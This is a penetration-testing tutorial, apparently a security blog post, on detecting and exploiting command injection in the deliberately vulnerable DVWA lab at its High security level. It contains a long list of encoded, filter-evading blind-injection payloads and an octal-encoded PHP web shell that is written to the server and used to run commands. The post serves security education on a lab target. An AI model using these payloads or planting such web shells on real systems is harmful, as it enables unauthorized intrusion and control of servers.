Command injection to web shell in DVWA (high security level) on Linux
Summary
This article describes an improved method for detecting command injection vulnerabilities on Linux. As a bonus, I will demonstrate an often-overlooked method of obfuscating PHP web shell payloads that allows for bypassing input validation restrictions of the target application.
We will use the Linux Docker implementation of the Damn Vulnerable Web Application (DVWA) Command Injection challenge with the security level set to “High”. Also, the attack approach is from a 100% black box perspective with no prior knowledge of the application input validation or prior knowledge of the binaries available on the target web server.
Disclaimer
This article is for informational and educational purpose only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.
Why this blog?
There is a lot of online information about different payloads that can be used to detect command line injection. The most notable is the PayloadsAllTheThings.This collection is really fantastic, it provides wordlists with a variety of payloads for non-blind and blind command injection.
However, you can significantly reduce your payload list by only focussing on blind command injection. After all, these payloads will work in a non-blind command injection context as well. Also, should create separate payload lists for Windows and for Linux. It doesn’t make sense to run Linux payloads on a Windows target. Additionally, we will not use payloads are based on out-of-band technologies. These payloads require outbound connections. Outbound connections are not always possible, you should never rely on this. Finally, we only use binaries in our payloads that we are sure are present on the target system. In this case, we’re talking about binaries that ship with the operating system, such as ‘sleep’ or ‘ping’.
In our approach, we will use the target server response time to determine if a command injection vulnerability exists. We will do that by appending different payloads to the vulnerable parameter, which causes controlled server response delays.
We will use the Damn Vulnerable Web Application (DVWA) command injection challenge with the security level set to high. When the security level is set to “high”, the web server performs extensive input validation, filtering out many characters.
Using the DVWA with the security level set to high, our goal is to find the command injection vulnerability with our specific crafted payload list for. Also, once we find the vulnerability, we will exploit it into a web shell.
Lab environment
This POC consists of 2 machines: an attacker machine (Kali Linux, 192.168.62.187) and a vulnerable Linux web server (DVWA Docker image 192.168.62.177):
Kali 64-bit [Version 24.2]
- IP-Address: 192.168.62.187
DVWA Linux
- IP-Address: 192.168.62.177
- Docker image https://hub.docker.com/r/vulnerables/web-dvwa
Part 1: Detect command Injection vulnerability on DVWA Linux (Security level=High)
Attack context:
· Target OS: Linux
· DVWA Security level: Medium and High
· Vulnerable web site: http://192.168.62.177/vulnerabilities/exec/
Let’s start the command line injection enumeration with normal user behavior when the DVWA Security level is set to “High”
1. Performed against vulnerable web server, Linux DVWA.
Set the DVWA security level to “High”.
2. Performed against vulnerable web server, Linux DVWA.
Configure your browser to use Burp Suite as an interceptor tool (we used the Burp Suite integrated browsers. Browse to the DVWA Command Injection site (http://192.168.62.177/vulnerabilities/exec/). Perform the ’ping a device’ function and ping the loopback address or localhost.
The TTL value (64) tells us it’s a Linux web server, and we can also see that this ping function sent four ICMP packets.
Next, let’s look at the HTTP traffic intercepted by Burp Suite. Find the request from step 1 in the Burp proxy history. As you can see, the target application uses the POST parameter “ip”.
To determine if a command injection vulnerability exists, we can inject the POST ip parameter containing various payloads for executing the Linux “sleep” command. The sleep command is part of the GNU Coreutils (https://www.gnu.org/software/coreutils/) and is present in almost all Linux distributions. Since the normal ping operation takes about 4 seconds (4 packets), a payload with a different latency payload should be used. In our case we will use payload with a latency of 7 seconds. With a sleep time of 7 seconds, the following can be inferred from the server response:
- Server response time is 11 seconds. Both the first and second command are executed.
- Server response time is 7 seconds. Only the second command is executed
For creating the payload list, we will use the techniques ‘command substitution’ and ‘string conversion’. Command substitution involves using the result of a command (for example ‘echo localhost’) with an existing command (the ‘ping’ command). String conversion provides the ability to bypass input validation. For example, if the payload cannot contain certain characters, you encode those characters into Base32, Base64 or hexadecimal format. To perform string conversion we can use the Kali Linux tools base32, base64 (both part of GNU Coreutils) and the xxd.
3. Optional: Performed on Kali Linux (you can skip this step and directly go to step 4)
Get the Base32, Base64, octal and hexadecimal presentation of string ‘sleep 7’. Open a Bash terminal use copy and paste to execute the following code:
# Base32 presentation for 'sleep 7'
echo sleep 7 | base32
# Base64 presentation for 'sleep 7'
echo sleep 7 | base64
# hexadecimal presentation for 'sleep 7’
echo sleep 7 | xxd --ps
# hexadecimal presentation for 'sleep 7’
printf 'sleep 7' |od -b -An -w2048|sed 's! !\\!g'
In our next step, we will include base32, base64, hexadecimal and octal presentations of ‘sleep 7’ in our payload list
4. Performed on Kali Linux.
Create a payload list that includes different variations of the command “sleep 7”. Copy and paste the payloads below to the clipboard:
; printf '\163\154\145\145\160\040\067'|sh
;`echo c2xlZXAgNwo=|base64 -d`
;echo 736c65657020370a|xxd --ps -r|sh
;echo c2xlZXAgNwo=|base64 -d|sh
;echo ONWGKZLQEA3QU===|base32 -d|sh
;sleep${IFS}7
() { :;}; /bin/bash -c "sleep 7"
&&`echo c2xlZXAgNwo=|base64 -d`
&&echo c2xlZXAgNwo=|base64 -d|sh
&&printf '\163\154\145\145\160\040\067'|sh
&&sleep${IFS}7
&`echo c2xlZXAgNwo=|base64 -d`
&echo ONWGKZLQEA3QU===|base32 -d|sh
&printf '\163\154\145\145\160\040\067'|sh
&sleep 7
&sleep${IFS}7
%00 printf '\163\154\145\145\160\040\067'|sh
%00 sleep 7
%00{.exec|echo c2xlZXAgNwo=|base64 -d|sh
%00{.exec|echo c2xlZXAgNwo=|base64 -d|sh}
%00{.exec|sleep 7
%00{.exec|sleep 7}
%00echo c2xlZXAgNwo=|base64 -d|sh
%00sleep 7
%00sleep$IFS7
`echo c2xlZXAgNwo=|base64 -d`
`echo ONWGKZLQEA3QU===|base32 -d`
`printf '\163\154\145\145\160\040\067'`
`sleep 7`
|`echo c2xlZXAgNwo=|base64 -d`
|echo 736c65657020370a|xxd --ps -r|sh
|echo ONWGKZLQEA3QU===|base32 -d|sh
|printf '\163\154\145\145\160\040\067'|sh
|sleep${IFS}7
|sleep 7
$(echo c2xlZXAgNwo=|base64 -d)
$(echo ONWGKZLQEA3QU===|base32 -d)
$(printf '\163\154\145\145\160\040\067')
$(sleep 7)
echo c2xlZXAgNwo=|base64 -d|sh
echo ONWGKZLQEA3QU===|base32 -d|sh
echo printf '\163\154\145\145\160\040\067'|sh
echo sleep 7|sh
FAIL_INTENT||sleep 7
FAIL_INTENT||sleep${IFS}7
FAIL_INTENT||`echo c2xlZXAgNwo=|base64 -d`
FAIL_INTENT||`echo ONWGKZLQEA3QU===|base32 -d`
FAIL_INTENT||echo c2xlZXAgNwo=|base64 -d|sh
FAIL_INTENT||echo ONWGKZLQEA3QU===|base32 -d|sh
FAIL_INTENT||printf '\163\154\145\145\160\040\067'|sh5. Performed on Kali Linux (DVWA should be at Security level=High).
Send the request from step 2 to the Burp Intruder. Configure the Intruder as follows:
Positions tab
Positions tab
- Type Sniper
- Set a position (for sleep payloads) after the valid value 127.0.0.1
Payloads tab
- Type Simple List: paste the ‘sleep 7’ payloads from step 4
Resource Pool tab
- Set maximum concurrent requests on 4
Start the attack.
6. Performed on Kali Linux (DVWA should be at Security level=High).
Analyse the attack results from step 5
We are lucky. We have two payloads that result in a server response time of 7 seconds. These are:
|sleep 7
|printf '\163\154\145\145\160\040\067'|sh
We successfully found the command injection vulnerability!
Part 2: Exploitation Linux DVWA command Injection vulnerability to web shell (Security level=High)
Exploitation of the DVWA with security level set to High is difficult, because many special characters are filtered, such as hyphen ‘-‘, brackets ‘()’, dollar sign ‘$’, ampersand ‘&’, backtick ‘`’ and the semicolon ‘;’.
Our options are reduced, because we cannot use the hyphen ‘-‘ symbol. In Linux, the hyphen is used as argument indicator for many binaries.
If we would try to set up a reverse shell without using the hyphen character, we would be limited to the tools like socat, netcat or wget.
Fortunately, we can use the backward slash ‘\‘. This will enable us to use the printf tool to decode octal values to a string. The tool printf is part of the GNU Coreutils (https://www.gnu.org/software/coreutils/) and is present in all Linux distributions. You can use printf to decode octal encoded payload back to ASCII. In that way, we can bypass the character filter restrictions. This is one of the most less know encoding technique. Because it only requires single quote and backward slash character, it will almost always work! Also, our payload will be a web shell, so we don’t have to rely on outbound access from the target server.
Our final payload is ready to use at step 8. If you want to, you can skip step 7.
7. Optional: Performed on Kali Linux (you are allowed to skip this step and directly go to step 8)
Get the octal presentation of the PHP web shell. Open a Bash terminal use copy and paste to execute the following code:
payload='<?php if(isset($_REQUEST["cmd"])){echo "<pre>";$cmd = ($_REQUEST["cmd"]);system($cmd);echo "</pre>";die;}?>'
printf $payload |od -b -An -w9999|sed 's! !\\!g'| sed 's!\\[0]!\\!g'
Result is the octal presentation of a PHP web shell.
\74\77\160\150\160\40\151\146\50\151\163\163\145\164\50\44\137\122\105\121\125\105\123\124\133\42\143\155\144\42\135\51\51\173\145\143\150\157\40\42\74\160\162\145\76\42\73\44\143\155\144\40\75\40\50\44\137\122\105\121\125\105\123\124\133\42\143\155\144\42\135\51\73\163\171\163\164\145\155\50\44\143\155\144\51\73\145\143\150\157\40\42\74\57\160\162\145\76\42\73\144\151\145\73\175\77\76
Alternative you can also use an online converter like
https://onlinestringtools.com/convert-string-to-octal.
Copy the result (octal presentation of a PHP web shell) to your clipboard.
8. Performed against vulnerable web server, Linux DVWA (Security Level=High).
Add payload to the command line injection vulnerability. Use the pipe ‘|’ for the second command to execute, like 127.0.0.1|<paste payload here>.
In our case will we use the vulnerability with the octal decode payload of the PHP web shell.
127.0.0.1|printf '[paste from clipboard]'>web_shell.php
Our final command:
127.0.0.1|printf '\74\77\160\150\160\40\151\146\50\151\163\163\145\164\50\44\137\122\105\121\125\105\123\124\133\42\143\155\144\42\135\51\51\173\145\143\150\157\40\42\74\160\162\145\76\42\73\44\143\155\144\40\75\40\50\44\137\122\105\121\125\105\123\124\133\42\143\155\144\42\135\51\73\163\171\163\164\145\155\50\44\143\155\144\51\73\145\143\150\157\40\42\74\57\160\162\145\76\42\73\144\151\145\73\175\77\76'>web_shell.php
9. Performed against vulnerable web server, Windows DVWA (Security Level=High).
Test the web shell. Navigate to http://192.168.62.177/vulnerabilities/exec/web_shell.php?cmd=ls+-l
Mitigations
The best way to prevent operating system command injection vulnerabilities is to never perform operating system commands from application layer code.
If you need to invoke operating system commands with user-supplied input, you must perform strong input validation.
References
https://hub.docker.com/r/vulnerables/web-dvwa
https://portswigger.net/web-security/os-command-injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
